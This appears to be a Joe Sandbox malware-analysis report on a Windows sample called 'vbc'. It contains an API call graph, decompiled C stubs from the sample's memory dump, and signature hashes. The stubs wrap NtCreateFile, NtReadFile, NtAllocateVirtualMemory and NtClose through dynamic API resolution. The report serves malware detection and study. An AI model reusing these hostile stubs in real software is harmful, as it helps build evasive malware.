LdrLoadDll 38407->38408 38409 41a5fc RtlAllocateHeap 38408->38409 38409->38396 38411 41be9d 38410->38411 38534 41a4f0 38410->38534 38411->38302 38414 414cd1 38413->38414 38416 414cd9 38413->38416 38414->38304 38415 414fac 38415->38304 38416->38415 38537 41d0a0 38416->38537 38418 414d2d 38419 41d0a0 2 API calls 38418->38419 38422 414d38 38419->38422 38420 414d86 38423 41d0a0 2 API calls 38420->38423 38422->38420 38542 41d140 38422->38542 38424 414d9a 38423->38424 38425 41d0a0 2 API calls 38424->38425 38427 414e0d 38425->38427 38426 41d0a0 2 API calls 38435 414e55 38426->38435 38427->38426 38429 414f84 38549 41d100 LdrLoadDll RtlFreeHeap 38429->38549 38431 414f8e 38550 41d100 LdrLoadDll RtlFreeHeap 38431->38550 38433 414f98 38551 41d100 LdrLoadDll RtlFreeHeap 38433->38551 38548 41d100 LdrLoadDll RtlFreeHeap 38435->38548 38436 414fa2 38552 41d100 LdrLoadDll RtlFreeHeap 38436->38552 38439 415ff1 38438->38439 38440 4156a0 8 API calls 38439->38440 38444 416007 38440->38444 38441 416010 38441->38308 38442 416047 38443 41bef0 2 API calls 38442->38443 38445 416058 38443->38445 38444->38441 38444->38442 38446 416093 38444->38446 38445->38308 38447 41bef0 2 API calls 38446->38447 38448 416098 38447->38448 38448->38308 38450 41ad64 38449->38450 38451 41abe0 LdrLoadDll 38449->38451 38553 41abe0 38450->38553 38451->38450 38453 41ad6d 38454 41abe0 LdrLoadDll 38453->38454 38455 41ad76 38454->38455 38456 41abe0 LdrLoadDll 38455->38456 38457 41ad7f 38456->38457 38458 41abe0 LdrLoadDll 38457->38458 38459 41ad88 38458->38459 38460 41abe0 LdrLoadDll 38459->38460 38461 41ad91 38460->38461 38462 41abe0 LdrLoadDll 38461->38462 38463 41ad9d 38462->38463 38464 41abe0 LdrLoadDll 38463->38464 38465 41ada6 38464->38465 38466 41abe0 LdrLoadDll 38465->38466 38467 41adaf 38466->38467 38468 41abe0 LdrLoadDll 38467->38468 38469 41adb8 38468->38469 38470 41abe0 LdrLoadDll 38469->38470 38471 41adc1 38470->38471 38472 41abe0 LdrLoadDll 38471->38472 38473 41adca 38472->38473 38474 41abe0 LdrLoadDll 38473->38474 38475 41add6 38474->38475 38476 41abe0 LdrLoadDll 38475->38476 38477 41addf 38476->38477 38478 41abe0 LdrLoadDll 38477->38478 38479 41ade8 38478->38479 38480 41abe0 LdrLoadDll 38479->38480 38481 41adf1 38480->38481 38482 41abe0 LdrLoadDll 38481->38482 38483 41adfa 38482->38483 38484 41abe0 LdrLoadDll 38483->38484 38485 41ae03 38484->38485 38486 41abe0 LdrLoadDll 38485->38486 38487 41ae0f 38486->38487 38488 41abe0 LdrLoadDll 38487->38488 38489 41ae18 38488->38489 38490 41abe0 LdrLoadDll 38489->38490 38491 41ae21 38490->38491 38492 41abe0 LdrLoadDll 38491->38492 38493 41ae2a 38492->38493 38494 41abe0 LdrLoadDll 38493->38494 38495 41ae33 38494->38495 38496 41abe0 LdrLoadDll 38495->38496 38497 41ae3c 38496->38497 38498 41abe0 LdrLoadDll 38497->38498 38499 41ae48 38498->38499 38500 41abe0 LdrLoadDll 38499->38500 38501 41ae51 38500->38501 38502 41abe0 LdrLoadDll 38501->38502 38503 41ae5a 38502->38503 38504 41abe0 LdrLoadDll 38503->38504 38505 41ae63 38504->38505 38506 41abe0 LdrLoadDll 38505->38506 38507 41ae6c 38506->38507 38508 41abe0 LdrLoadDll 38507->38508 38509 41ae75 38508->38509 38510 41abe0 LdrLoadDll 38509->38510 38511 41ae81 38510->38511 38512 41abe0 LdrLoadDll 38511->38512 38513 41ae8a 38512->38513 38514 41abe0 LdrLoadDll 38513->38514 38515 41ae93 38514->38515 38516 41abe0 LdrLoadDll 38515->38516 38517 41ae9c 38516->38517 38518 41abe0 LdrLoadDll 38517->38518 38519 41aea5 38518->38519 38520 41abe0 LdrLoadDll 38519->38520 38521 41aeae 38520->38521 38522 41abe0 LdrLoadDll 38521->38522 38523 41aeba 38522->38523 38524 41abe0 LdrLoadDll 38523->38524 38525 41aec3 38524->38525 38526 41abe0 LdrLoadDll 38525->38526 38527 41aecc 38526->38527 38527->38312 38529 41af60 LdrLoadDll 38528->38529 38530 419e8c 38529->38530 38561 87fdc0 LdrInitializeThunk 38530->38561 38531 419ea3 38531->38238 38533->38309 38535 41af60 LdrLoadDll 38534->38535 38536 41a50c NtAllocateVirtualMemory 38535->38536 38536->38411 38538 41d0b0 38537->38538 38539 41d0b6 38537->38539 38538->38418 38540 41c0c0 2 API calls 38539->38540 38541 41d0dc 38540->38541 38541->38418 38543 41d165 38542->38543 38544 41d19d 38542->38544 38545 41c0c0 2 API calls 38543->38545 38544->38422 38546 41d17a 38545->38546 38547 41bef0 2 API calls 38546->38547 38547->38544 38548->38429 38549->38431 38550->38433 38551->38436 38552->38415 38554 41abfb 38553->38554 38559 415aa0 LdrLoadDll 38554->38559 38556 41ac1b 38558 41accf 38556->38558 38560 415aa0 LdrLoadDll 38556->38560 38558->38453 38558->38558 38559->38556 38560->38558 38561->38531 38562->38318 38564 41af60 LdrLoadDll 38563->38564 38565 41a63c RtlFreeHeap 38564->38565 38565->38322 38567 407220 38566->38567 38568 40721b 38566->38568 38569 41be70 2 API calls 38567->38569 38568->38246 38576 407245 38569->38576 38570 4072a8 38570->38246 38571 419e70 2 API calls 38571->38576 38572 4072ae 38573 4072d4 38572->38573 38575 41a570 2 API calls 38572->38575 38573->38246 38578 4072c5 38575->38578 38576->38570 38576->38571 38576->38572 38577 41be70 2 API calls 38576->38577 38582 41a570 38576->38582 38577->38576 38578->38246 38580 41a570 2 API calls 38579->38580 38581 4074ee 38580->38581 38581->38207 38583 41a58c 38582->38583 38584 41af60 LdrLoadDll 38582->38584 38587 87fb68 LdrInitializeThunk 38583->38587 38584->38583 38585 41a5a3 38585->38576 38587->38585 38589 41b623 38588->38589 38592 40a140 38589->38592 38591 40906a 38591->38213 38594 40a164 38592->38594 38593 40a16b 38593->38591 38594->38593 38595 40a1a0 LdrLoadDll 38594->38595 38596 40a1b7 38594->38596 38595->38596 38596->38591 38598 40a4b3 38597->38598 38600 40a530 38598->38600 38612 419c40 LdrLoadDll 38598->38612 38600->38220 38602 41af60 LdrLoadDll 38601->38602 38603 40d5ab 38602->38603 38603->38223 38604 41a780 38603->38604 38605 41af60 LdrLoadDll 38604->38605 38606 41a79f LookupPrivilegeValueW 38605->38606 38606->38225 38608 41a22c 38607->38608 38609 41af60 LdrLoadDll 38607->38609 38613 87fed0 LdrInitializeThunk 38608->38613 38609->38608 38610 41a24b 38610->38226 38612->38600 38613->38610 38615 40a637 38614->38615 38616 40a490 LdrLoadDll 38615->38616 38617 40a666 38616->38617 38617->38150 38619 40d69a 38618->38619 38627 40d750 38618->38627 38620 40a490 LdrLoadDll 38619->38620 38621 40d6bc 38620->38621 38628 419ef0 38621->38628 38623 40d6fe 38631 419f30 38623->38631 38626 41a440 2 API calls 38626->38627 38627->38153 38627->38155 38629 41af60 LdrLoadDll 38628->38629 38630 419f0c 38629->38630 38630->38623 38632 419f4c 38631->38632 38633 41af60 LdrLoadDll 38631->38633 38636 8807ac LdrInitializeThunk 38632->38636 38633->38632 38634 40d744 38634->38626 38636->38634 38638 40a29d 38637->38638 38639 40a2a1 38637->38639 38638->38165 38640 40a2ba 38639->38640 38641 40a2ec 38639->38641 38694 419c80 LdrLoadDll 38640->38694 38695 419c80 LdrLoadDll 38641->38695 38643 40a2fd 38643->38165 38645 40a2dc 38645->38165 38647 414ff1 38646->38647 38648 40d800 3 API calls 38647->38648 38649 415016 38648->38649 38649->38167 38651 407edc 38650->38651 38652 407e2e 38650->38652 38653 407f9c 38651->38653 38656 407210 4 API calls 38651->38656 38658 407fba 38651->38658 38654 407210 4 API calls 38652->38654 38653->38658 38729 40da70 10 API calls 38653->38729 38660 407e38 38654->38660 38663 407efd 38656->38663 38657 407fb0 38657->38169 38658->38169 38660->38651 38662 407ed2 38660->38662 38696 407b10 38660->38696 38661 407b10 17 API calls 38661->38663 38664 4074d0 2 API calls 38662->38664 38663->38653 38663->38661 38665 407f92 38663->38665 38664->38651 38666 4074d0 2 API calls 38665->38666 38666->38653 38668 41af60 LdrLoadDll 38667->38668 38669 41a4cc 38668->38669 38868 87fea0 LdrInitializeThunk 38669->38868 38670 40ad72 38672 40d800 38670->38672 38673 40d81d 38672->38673 38869 419f70 38673->38869 38676 40d865 38676->38173 38677 419fc0 2 API calls 38678 40d88e 38677->38678 38678->38173 38680 41af60 LdrLoadDll 38679->38680 38681 419fdc 38680->38681 38875 87fc60 LdrInitializeThunk 38681->38875 38682 40add5 38682->38179 38682->38182 38685 41af60 LdrLoadDll 38684->38685 38686 41a02c 38685->38686 38876 87fc90 LdrInitializeThunk 38686->38876 38687 40aea9 38687->38190 38690 41af60 LdrLoadDll 38689->38690 38691 419dec 38690->38691 38877 880078 LdrInitializeThunk 38691->38877 38692 40aefc 38692->38194 38694->38645 38695->38643 38697 407b35 38696->38697 38730 419cc0 38697->38730 38700 407b89 38700->38660 38701 407c0a 38765 40d950 LdrLoadDll NtClose 38701->38765 38702 419eb0 2 API calls 38703 407bad 38702->38703 38703->38701 38705 407bb8 38703->38705 38707 407c36 38705->38707 38733 40af10 38705->38733 38706 407c25 38708 407c42 38706->38708 38709 407c2c 38706->38709 38707->38660 38766 419d40 LdrLoadDll 38708->38766 38711 41a440 2 API calls 38709->38711 38711->38707 38712 407bd2 38712->38707 38753 407940 38712->38753 38714 407c6d 38716 40af10 5 API calls 38714->38716 38718 407c8d 38716->38718 38718->38707 38767 419d70 LdrLoadDll 38718->38767 38720 407cb2 38768 419e00 LdrLoadDll 38720->38768 38722 407ccc 38723 419dd0 2 API calls 38722->38723 38724 407cdb 38723->38724 38725 41a440 2 API calls 38724->38725 38726 407ce5 38725->38726 38769 407710 38726->38769 38728 407cf9 38728->38660 38729->38657 38731 41af60 LdrLoadDll 38730->38731 38732 407b7f 38731->38732 38732->38700 38732->38701 38732->38702 38736 40af3b 38733->38736 38734 40d800 3 API calls 38735 40af9a 38734->38735 38737 419fc0 2 API calls 38735->38737 38744 40afe3 38735->38744 38736->38734 38738 40afc5 38737->38738 38739 40afcc 38738->38739 38742 40afef 38738->38742 38740 41a010 2 API calls 38739->38740 38741 40afd9 38740->38741 38743 41a440 2 API calls 38741->38743 38745 40b059 38742->38745 38746 40b039 38742->38746 38743->38744 38744->38712 38747 41a010 2 API calls 38745->38747 38748 41a440 2 API calls 38746->38748 38749 40b06b 38747->38749 38750 40b046 38748->38750 38751 41a440 2 API calls 38749->38751 38750->38712 38752 40b075 38751->38752 38752->38712 38754 407956 38753->38754 38785 419830 38754->38785 38756 407ae1 38756->38660 38757 40796f 38757->38756 38806 407510 38757->38806 38759 407a55 38759->38756 38760 407710 11 API calls 38759->38760 38761 407a83 38760->38761 38761->38756 38762 419eb0 2 API calls 38761->38762 38763 407ab8 38762->38763 38763->38756 38764 41a4b0 2 API calls 38763->38764 38764->38756 38765->38706 38766->38714 38767->38720 38768->38722 38770 407739 38769->38770 38846 407680 38770->38846 38773 41a4b0 2 API calls 38774 40774c 38773->38774 38774->38773 38775 4077d7 38774->38775 38777 4077d2 38774->38777 38854 40d9d0 38774->38854 38775->38728 38776 41a440 2 API calls 38778 40780a 38776->38778 38777->38776 38778->38775 38779 419cc0 LdrLoadDll 38778->38779 38780 40786f 38779->38780 38780->38775 38858 419d00 38780->38858 38782 4078d3 38782->38775 38783 4156a0 8 API calls 38782->38783 38784 407928 38783->38784 38784->38728 38786 41c0c0 2 API calls 38785->38786 38787 419847 38786->38787 38813 408760 38787->38813 38789 419862 38790 4198a0 38789->38790 38791 419889 38789->38791 38794 41be70 2 API calls 38790->38794 38792 41bef0 2 API calls 38791->38792 38793 419896 38792->38793 38793->38757 38795 4198da 38794->38795 38796 41be70 2 API calls 38795->38796 38797 4198f3 38796->38797 38798 419b94 38797->38798 38819 41beb0 38797->38819 38804 41bef0 2 API calls 38798->38804 38801 419b80 38802 41bef0 2 API calls 38801->38802 38803 419b8a 38802->38803 38803->38757 38805 419be9 38804->38805 38805->38757 38807 40760f 38806->38807 38808 407525 38806->38808 38807->38759 38808->38807 38809 4156a0 8 API calls 38808->38809 38810 407592 38809->38810 38811 41bef0 2 API calls 38810->38811 38812 4075b9 38810->38812 38811->38812 38812->38759 38814 408785 38813->38814 38815 40a140 LdrLoadDll 38814->38815 38816 4087b8 38815->38816 38818 4087dd 38816->38818 38822 40b940 38816->38822 38818->38789 38821 419b79 38819->38821 38840 41a530 38819->38840 38821->38798 38821->38801 38823 40b96c 38822->38823 38824 41a190 LdrLoadDll 38823->38824 38825 40b985 38824->38825 38826 40b98c 38825->38826 38833 41a1d0 38825->38833 38826->38818 38830 40b9c7 38831 41a440 2 API calls 38830->38831 38832 40b9ea 38831->38832 38832->38818 38834 41a1ec 38833->38834 38835 41af60 LdrLoadDll 38833->38835 38839 87fbb8 LdrInitializeThunk 38834->38839 38835->38834 38836 40b9af 38836->38826 38838 41a7c0 LdrLoadDll 38836->38838 38838->38830 38839->38836 38841 41af60 LdrLoadDll 38840->38841 38842 41a54c 38841->38842 38845 880048 LdrInitializeThunk 38842->38845 38843 41a567 38843->38821 38845->38843 38847 407698 38846->38847 38848 40a140 LdrLoadDll 38847->38848 38849 4076b3 38848->38849 38850 4076c3 38849->38850 38861 415aa0 LdrLoadDll 38849->38861 38852 4076cc PostThreadMessageW 38850->38852 38853 4076e0 38850->38853 38852->38853 38853->38774 38855 40d9e3 38854->38855 38862 419e40 38855->38862 38859 419d1c 38858->38859 38860 41af60 LdrLoadDll 38858->38860 38859->38782 38860->38859 38861->38850 38863 41af60 LdrLoadDll 38862->38863 38864 419e5c 38863->38864 38867 87fd8c LdrInitializeThunk 38864->38867 38865 40da0e 38865->38774 38867->38865 38868->38670 38870 419f8c 38869->38870 38871 41af60 LdrLoadDll 38869->38871 38874 87ffb4 LdrInitializeThunk 38870->38874 38871->38870 38872 40d85e 38872->38676 38872->38677 38874->38872 38875->38682 38876->38687 38877->38692 38880 87f900 LdrInitializeThunk

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 227 40a140-40a169 call 41cdc0 230 40a16b-40a16e 227->230 231 40a16f-40a17d call 41d1e0 227->231 234 40a18d-40a19e call 41b500 231->234 235 40a17f-40a18a call 41d460 231->235 240 40a1a0-40a1b4 LdrLoadDll 234->240 241 40a1b7-40a1ba 234->241 235->234 240->241
                                              C-Code - Quality: 100%
                                              			E0040A140(void* _a4, intOrPtr _a8) {
                                              				char* _v8;
                                              				struct _EXCEPTION_RECORD _v12;
                                              				struct _OBJDIR_INFORMATION _v16;
                                              				char _v536;
                                              				void* _t15;
                                              				struct _OBJDIR_INFORMATION _t17;
                                              				struct _OBJDIR_INFORMATION _t18;
                                              				void* _t30;
                                              				void* _t31;
                                              				void* _t32;
                                              
                                              				_v8 =  &_v536;
                                              				_t15 = E0041CDC0( &_v12, 0x104, _a8);
                                              				_t31 = _t30 + 0xc;
                                              				if(_t15 != 0) {
                                              					_t17 = E0041D1E0(__eflags, _v8);
                                              					_t32 = _t31 + 4;
                                              					__eflags = _t17;
                                              					if(_t17 != 0) {
                                              						E0041D460( &_v12, 0);
                                              						_t32 = _t32 + 8;
                                              					}
                                              					_t18 = E0041B500(_v8);
                                              					_v16 = _t18;
                                              					__eflags = _t18;
                                              					if(_t18 == 0) {
                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                              						return _v16;
                                              					}
                                              					return _t18;
                                              				} else {
                                              					return _t15;
                                              				}
                                              			}













                                              0x0040a15c
                                              0x0040a15f
                                              0x0040a164
                                              0x0040a169
                                              0x0040a173
                                              0x0040a178
                                              0x0040a17b
                                              0x0040a17d
                                              0x0040a185
                                              0x0040a18a
                                              0x0040a18a
                                              0x0040a191
                                              0x0040a199
                                              0x0040a19c
                                              0x0040a19e
                                              0x0040a1b2
                                              0x00000000
                                              0x0040a1b4
                                              0x0040a1ba
                                              0x0040a16e
                                              0x0040a16e
                                              0x0040a16e

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1B2
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
                                              • Instruction ID: 11ee5f3ab083712590cb1e55c2eb63b1a51d73a2d1413e9428d26e0fcce9e281
                                              • Opcode Fuzzy Hash: c06de1ea13a8af031dc4c62c0dda777427f6ee9b41022bae029d2c9e7cdc61ad
                                              • Instruction Fuzzy Hash: 810152B5E0020DB7DF10DBA1DC42FDEB7789B54308F0441A9E908A7281F634EB548B95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 242 41a310-41a326 243 41a32c-41a361 NtCreateFile 242->243 244 41a327 call 41af60 242->244 244->243
                                              C-Code - Quality: 100%
                                              			E0041A310(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                              				long _t21;
                                              
                                              				_t3 = _a4 + 0xc5c; // 0xc5c
                                              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                              				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                              				return _t21;
                                              			}




                                              0x0041a31f
                                              0x0041a327
                                              0x0041a35d
                                              0x0041a361

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                              • Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
                                              • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                              • Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 245 41a30c-41a361 call 41af60 NtCreateFile
                                              C-Code - Quality: 79%
                                              			E0041A30C(void* __eax, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                              				long _t23;
                                              
                                              				asm("cli");
                                              				_t17 = _a4;
                                              				_t3 = _t17 + 0xc5c; // 0xc5c
                                              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t17, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
                                              				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                              				return _t23;
                                              			}




                                              0x0041a30e
                                              0x0041a313
                                              0x0041a31f
                                              0x0041a327
                                              0x0041a35d
                                              0x0041a361

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409113,?,00415807,00409113,FFFFFFFF,?,?,FFFFFFFF,00409113,00415807,?,00409113,00000060,00000000,00000000), ref: 0041A35D
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 096de45c29c7e855336afe3d0c2af4b78dab0c9965d5927c13043ab8df212e26
                                              • Instruction ID: 263d1f3f99240851049625e71f71d18099490efd6d8311ba672ad34fb7675b53
                                              • Opcode Fuzzy Hash: 096de45c29c7e855336afe3d0c2af4b78dab0c9965d5927c13043ab8df212e26
                                              • Instruction Fuzzy Hash: 8DF0E2B2214149AFCB08CF98DD85CEB77A9EF8C754B15868DFA1D93202D634E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 248 41a3c0-41a409 call 41af60 NtReadFile
                                              C-Code - Quality: 37%
                                              			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                              				intOrPtr* _t14;
                                              				void* _t18;
                                              				intOrPtr* _t27;
                                              
                                              				_t13 = _a4;
                                              				_t27 = _a4 + 0xc64;
                                              				_t14 = E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
                                              				 *_t14 =  *_t14 + _t14;
                                              				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
                                              				return _t18;
                                              			}






                                              0x0041a3c3
                                              0x0041a3cf
                                              0x0041a3d7
                                              0x0041a3da
                                              0x0041a405
                                              0x0041a409

                                              APIs
                                              • NtReadFile.NTDLL(004159C2,5DA515B3,FFFFFFFF,00415681,?,?,004159C2,?,00415681,FFFFFFFF,5DA515B3,004159C2,?,00000000), ref: 0041A405
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                              • Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
                                              • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                              • Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 251 41a4f0-41a52d call 41af60 NtAllocateVirtualMemory
                                              C-Code - Quality: 100%
                                              			E0041A4F0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                              				long _t14;
                                              
                                              				_t3 = _a4 + 0xc7c; // 0x3c7c
                                              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                              				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                              				return _t14;
                                              			}




                                              0x0041a4ff
                                              0x0041a507
                                              0x0041a529
                                              0x0041a52d

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409113,00000000), ref: 0041A529
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                              • Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
                                              • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                              • Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 263 41a440-41a469 call 41af60 NtClose
                                              C-Code - Quality: 100%
                                              			E0041A440(intOrPtr _a4, void* _a8) {
                                              				long _t8;
                                              
                                              				_t5 = _a4;
                                              				_t2 = _t5 + 0x14; // 0x56c29f0f
                                              				_t3 = _t5 + 0xc6c; // 0x409d7f
                                              				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
                                              				_t8 = NtClose(_a8); // executed
                                              				return _t8;
                                              			}




                                              0x0041a443
                                              0x0041a446
                                              0x0041a44f
                                              0x0041a457
                                              0x0041a465
                                              0x0041a469

                                              APIs
                                              • NtClose.NTDLL(004159A0,?,?,004159A0,00409113,FFFFFFFF), ref: 0041A465
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                              • Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
                                              • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                              • Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                              • Associated: 00000009.00000002.1070174903.0000000000860000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070372671.0000000000950000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070380153.0000000000960000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070386359.0000000000964000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070392298.0000000000967000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070398282.0000000000970000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000009.00000002.1070430882.00000000009D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_860000_vbc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
